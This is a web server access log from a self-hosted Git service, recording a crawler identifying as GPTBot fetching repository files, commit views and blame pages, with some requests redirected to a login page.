"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fstatic%2fjs%2fapp.js" [Client 74.7.227.38] [Length 54133] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10939] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 25199] [Gzip 12.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/README.md" [Client 74.7.227.38] [Length 804] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" -[17/Feb/2026:15:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:15:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal" -[17/Feb/2026:15:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10943] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10941] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10943] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" -[17/Feb/2026:15:29:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Contact.tsx" -[17/Feb/2026:15:30:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:30:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 